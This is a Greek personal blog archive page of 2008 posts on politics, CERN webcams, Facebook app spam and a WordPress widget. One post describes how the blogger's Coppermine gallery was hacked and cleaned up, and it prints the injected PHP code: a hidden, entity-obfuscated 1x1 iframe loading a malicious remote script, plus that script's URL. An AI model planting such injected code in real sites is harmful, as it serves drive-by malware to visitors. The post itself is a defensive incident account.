Browsing Posts published in April, 2008

[via Pathfinder]

Εκτός του ότι για ακόμα μια φορά φαίνεται η ανικανότητα μερικών, έχω να σχολιάσω και αυτό που αναφέρεται στο άρθρο ότι είπε ο ο υφυπουργός, κ. Καλογιάννης, και συγκεκριμένα ότι η εξέλιξη αυτή είναι προϊόν της δυσπιστίας που δημιουργήθηκε στην Επιτροπή από την κυβέρνηση του ΠΑΣΟΚ.

Δηλαδή για να καταλάβω μετά από 4 χρόνια ακόμα το ΠΑΣΟΚ φταίει; Αν πάμε έτσι δεν θα φτάσουμε ποτέ πουθενά… γιατί αν σε 1, 2, 5 χρόνια βγεί πάλι το ΠΑΣΟΚ και για 4 χρόνια λέει ότι για όλα τα στραβά φταίει η προηγούμενη κυβέρνηση (που θα το λέει δηλαδή, αλλά τι να καθόμαστε να συζητάμε τώρα…) ΠΟΤΕ ΘΑ ΠΡΟΧΩΡΗΣΕΙ ΑΥΤΗ Η ΧΩΡΑ; Ε;

ΠΟΤΕ ΘΑ ΜΑΘΟΥΝ ΟΡΙΣΜΕΝΟΙ ΝΑ ΑΝΑΛΑΜΒΑΝΟΥΝ ΕΥΘΥΝΕΣ ΚΑΙ ΝΑ ΜΗΝ ΤΙΣ ΡΙΧΝΟΥΝ ΣΤΟΥΣ ΠΡΟΗΓΟΥΜΕΝΟΥΣ Η ΝΑ ΑΦΗΝΟΥΝ ΤΟΥΣ ΕΠΟΜΕΝΟΥΣ ΝΑ ΒΓΑΛΟΥΝ ΤΑ ΣΚΑΤΑ ΑΠΟ ΤΟ ΛΑΚΚΟ;

Περαστικά.

update:

Βρήκα περισσότερα στο cosmo.gr, όπου γράφουν ότι:

ο έχων την ευθύνη της σύνταξης των εκθέσεων, κ. Δημήτης Λάλας, ήταν αυτός που κατήγγειλε τη χώρα στον Ο.Η.Ε. και ότι σήμερα είναι στο ΠΑ.ΣΟ.Κ. επικεφαλής του τομέα για τις κλιματικές αλλαγές”

Αν ισχύει αυτό που υπονοείται σε αυτή τη φράση, τότε φαίνεται ξεκάθαρα η τραγελαφική κατάσταση του πολιτικού μας τοπίου…

Από το άρθρο του cosmo θα τονίσω μόνο το εξής… Είμαστε μόνοι ανάμεσα σε 141 χώρες.

Ενα γρήγορο google search βγάζει όλο αποτελέσματα με προειδοποιήσεις και στόχους που η Ελλάδα απέτυχε να πραγματοποιήσει σχετικά με το Κιότο. Γιατί το παιδεύουμε το θέμα θα ήθελα;

Ένα τελευταίο λινκ και κλείνω εδώ. Είναι προς μία ανακοίνωση του 2002, με τίτλο KYOTO PROTOCOL: Greece – The Black Sheep of EU? Και αναφέρεται στη θέση που είχαμε βρεθεί τότε όταν τελευταίοι και καταιδρωμένοι έπρεπε να μας μαλώσουν για να επικυρώσουμε το πρωτόκολλο…

Σε συνέχεια προηγούμενου post. Ανακοινώθηκε επείγον update για το Coppermine Gallery που διορθώνει το κενό ασφαλείας που εκμεταλλεύθηκαν για τη χτεσινή επίθεση. Από ότι καταλαβαίνω από τον κώδικα, έχει να κάνει με τον έλεγχο του τύπου αρχείου που γίνεται upload.

Σε περίπτωση που η σελίδα σας είναι χακαρισμένη, πρώτα διορθώστε όλα τα προβλήματα και μετά προχωρήστε στο update. Σε πρώτη φάση αυτό που έκανα εγώ είναι μια αναζήτηση (και διαγραφή!) σε όλα τα αρχεία του gallery για το string που είχε γίνει inject στο τέλος τους.

Από τα φόρουμ του Coppermine, συνιστάται:

Basic procedure (to give you a general idea what you’d need to do):

  • Make a full backup of all files and folders on your webspace
  • Replace all possibly infected files with fresh ones that are guaranteed to be clean (from a fresh package)
  • Scan the files and folders you downloaded for executable files: PHP, Perl files, bash scripts, whatever the user could have left (depending on the skills of the attacker) and delete all of them on your webspace (the tricky part being that you need to really find all backdoors)
  • Browse the database, coppermine’s user table. Search for admin accounts. Delete all that you don’t know. Change the password of your own admin account
  • Change all seurity-sensitive passwords (for FTP access, website control panel, mySQL) and reflect your changes in the apps you use (changed mySQL account!)
  • Tell your webhost about the attack. Ask them to see the server logs for the period where the attack has happened

Και αναρωτιόμουν σήμερα γιατί δεν έβλεπα επισκέψεις… είχα όμως τόση δουλειά (που ευτυχώς από μια πλευρά) δεν άνοιξα να δω τι συνέβαινε στη σελίδα. Βράδυ που γύρισα σπίτι είδα ότι το wordpress δεν δούλευε καθόλου (το Google XML Sitemaps plugin έβγαζε πρόβλημα). Πρώτη μου κίνηση ήταν να απενεργοποιήσω το συγκεκριμένο plugin. Μετά όλα δούλεψαν αλλά παντού στις σελίδες μου έβγαιναν κάτι περίεργα κουτάκια, οπότε άρχισα να κοιτάω το source code και να ψάχνω στο γούγλη.

Δεν άργησα να βρώ αυτή τη σελίδα στα φόρουμ του Coppermine: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?. Και όντως μέσα στο φάκελο με τα άλμπουμ (albums/userpics/10001), υπήρχε το αρχείο 142739_298w3.jpg (σε μερικούς έχει κατάληξη .zip) που δεν ήταν εικόνα αλλά κώδικας php. Τώρα γιατί ένα jpg αρχείο θεωρείται εκτελέσιμο, μάλλον έχει να κάνει με τις ρυθμίσεις του server – δεν έχω ιδιαίτερες γνώσεις επί του θέματος οπότε αν ξέρει κανείς ενημερώστε… Τέσπα, αυτό το αρχειάκι είχε κάνει και όλη τη ζημιά. Μέχρι να βρεθεί λύση έχω απενεργοποιήσει το Coppermine πάντως για καλό και για κακό…

Ο κώδικας που έγινε insert στο τέλος κάθε php και html αρχείου είναι ο εξής:

<?php echo ‘<iframe src=”&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;” width=1 height=1></iframe>’; ?>

Και πρόκειται για link στο (μην κάνετε κλικ εδώ! – πιθανώς επικίνδυνο αρχείο!!!!):

http://cdpuvbhfzz.com/dl/adv598.php

Σύμφωνα με κάποιους το αρχείο αυτό περιέχει αρκετά καμουφλαρισμένη javascript η οποία μπορεί να χρησιμοποιηθεί για να στείλει από popups μέχρι trojans και ιούς.

Μερικές σελίδες έχουν ήδη γίνει blacklisted από το google για αυτό το λόγο… Θα προσπαθήσω να το παρακολουθήσω το θέμα. Για την ώρα προτείνεται η απενεργοποίηση των URI uploads (άπο την επιλογή Groups του admin interface).

update: οκ, έκανα μερικές αλλαγές και ελπίζω να μην έχω πρόβλημα. Θα ξανανοίξω το coppermine και θα πάω για ύπνο…. το πρωί βλέπουμε αν έκανα καλά ή όχι.

update2: διαπίστωσα ότι μου είχαν αλλάξει αρκετές ρυθμίσεις στην gallery. Κυρίως οπτικές. Υπήρχε όμως και μια πιο πρακτική. Είχε αλλάξει η επιλογή Max width or height of an intermediate picture/video στην τιμή 1, με αποτέλεσμα αν προσπαθούσαν να προσθέσω μια εικόνα μου έβγαζε ότι “Unable to create thumbnail or reduced size image”. Την επανέφερα στην προκαθορισμένη τιμή (400) και όλα εντάξει…

CoppermineSC database error: [Table 'chrislaz_copp1.cpg_config' doesn't exist]
SELECT value FROM cpg_config WHERE name="ecards_more_pic_target" OR name="fullpath"

CoppermineSC database error: [Table 'chrislaz_copp1.cpg_pictures' doesn't exist]
SELECT filepath, filename, title, aid, pid FROM cpg_pictures WHERE pid=330

CoppermineSC database error: [Table 'chrislaz_copp1.cpg_config' doesn't exist]
SELECT value FROM cpg_config WHERE name="ecards_more_pic_target" OR name="fullpath"

CoppermineSC database error: [Table 'chrislaz_copp1.cpg_pictures' doesn't exist]
SELECT filepath, filename, title, aid, pid FROM cpg_pictures WHERE pid=323

Σας έπεσε μακριά η Γενεύη και δεν μπορούσατε να επισκευτείτε το CERN στο πρόσφατο open day? Μπορείτε να ρίξετε μια γρήγορη ματιά στα πειράματα μέσω των webcams που υπάρχουν! Ακολουθήστε με σε μια ξενάγηση…

Για λόγους ευγενείας ας ξεκινήσουμε με το ATLAS :)

Εδώ είναι το ATLAS Control Room από όπου γίνεται ο έλεγχος/παρακολούθηση του πειράματος:

Και μερικές φωτογραφίες του πειράματος:

Εδώ πίσω από την τεράστια σκαλωσιά φαίνεται ένα μικρό τμήμα (εκείνο με τις κόκκινες λωρίδες) από τους τοροειδείς μαγνήτες του ATLAS.

[cpg_imagefixnormal:321]

Εδώ οι μαγνήτες φαίνονται λίγο καλύτερα:
continue reading…

Το κακό έχει παραγίνει με τις εφαρμογές του facebook(*)… έφτασα τις 74 blocked applications… Σημειωτέον ότι κάνω block μόνο όσες μου στέλνουν προσκλήσεις. Έχω ελάχιστες εγκατεστημένες: iLike, Entourage, Friend Wheel, Movies, τον ΥπερΠόκο (να στηρίξουμε και καμιά Ελληνική παραγωγή!) και συνήθως ανακυκλώνω 1-2 ακόμα κατα καιρούς σε περίπτωση που μου στείλουν κανένα “δωράκι” για να μη χαλάσουμε τις καρδιές μας με όποιον έκανε τον κόπο να στείλει κάτι ειδικά σε εμένα (και όχι τις μαζικές αποστολές που απεχθάνομαι…)

Facebook: Ignore All Invites from this Friend

Το έχω σκεφτεί να αρχίσω να χρησιμοποιώ την καινούργια επιλογή “Ignore All Invites from this Friend” αλλά 1) το θεωρώ λίγο υπερβολικό αυτή τη στιγμή (δεν παίρνω τόσα πολλά invites όπως στο παρελθόν) και 2) πως θα εμπλουτίσω τη συλλογή μου; Ε;!

Έτσι σαν λίστα αναφοράς, αυτή τη στιγμή είναι blocked τα παρακάτω:

Super Wall
Likeness
Are YOU Interested?
Which Friends Character Are You?
Flirtable
YES or NO?
My Heroes Ability
Vampires
FunWall
Online People
Friends I Want To Fu*k
Make New Friends
Who Were You In a Past Life?
Sketch Me
Owned!
On A Deserted Island With…
Slayers
Secret Crushes
Knighthood
What Sports Car Should You Drive?
Which Cartoon Are You?
HugMe
What’s your Grade in the Bedroom?
How Many Kids Will You Have?
HOT or NOT
What is Your Secret Sexual Fantasy?
ScrapBox
Body Language
What Does My Birthday Mean?
Dr. Phil’s Personality Test
Sparkey
Likeness UNRATED
Send Luck
How experimental are you in bed?
Travel Buddies
What Tattoo Should You Get?
Profile Watcher
What’s your biggest turn-on?
Discover the color of your aura
What is Your 80′s Song?
Friends For Sale!
My Fairy
Reveal
Cooties
Which Rockstar Are You?
Moods
Most Eligible Singles
What Mythological Creature Are You?
Launch a missile
POSO “BRWMIKO” MYALO EXEIS…!!!
Throw tomatoes!
Possidi
Smiles
Greece Podosfairo
You’re a Hottie
Esy ksereis pws to triboun to piperi?
Smartest Person Contest
Have You Ever???
Trout Slap
Poso tairiazoume??
Pillow Fight!
Speed Racing
Zombies
Superheroes
Premier Football
What Historical Event Are You?
Beer!
Orgasm
Who’s Online
ti ama3i sou tairiazei?
What are your dreams are trying to tell you?
aCounter
Smurf
MY SEXY FRIENDS

(και συνεχίζουμε είπαμε!)

(*) εντάξει δεν είναι τόσο χάλια όπως παλιά αλλά μου ήρθαν 2-3 μαζεμένα σήμερα…

After finding this counter at the Fedora website, counting down the days until its release, I tried to create a very simple WordPress widget to help you add this counter to your sidebar.

Just grab the Fedora 9 countdown WordPress widget, decompress it in the wp-content/plugins/widgets directory of your blog, enable it from the plugins list and then from the Design -> Widgets add it to your sidebar. Remember: you’ll need a widgets-enabled theme for this to work!

Είναι λίγο παλιά βέβαια (28/01/2008) άλλα έχει ενδιαφέρον μια ανακοίνωση του Hellug (Hellenic Linux Users Group – Ένωση Χρηστών και Φίλων Linux Ελλάδος) σχετικά με τον τρόπο αντιμετώπισης τους από το υπουργείο και την κυβέρνηση πάνω στο θέμα του γνωστού νομοσχεδίου περί Microsoft…

Μερικοί στην ελλαδίτσα ποτέ δεν θα μάθουν (γι’ αυτό θα μείνει με υποκοριστικό…). Και δεν έχει να κάνει με το ότι πρόκειται για ελεύθερο λογισμικό κλπ κλπ… αλλά η νοοτροπία αυτή είναι γενικότερη στον κρατικό μηχανισμό. Αντε μην αρχίσω Κυριακάτικα…

Το βρήκα στο Μετά την εφημερίδα.

Powered by WordPress Web Design by SRS Solutions © 2010 spinning world Design by SRS Solutions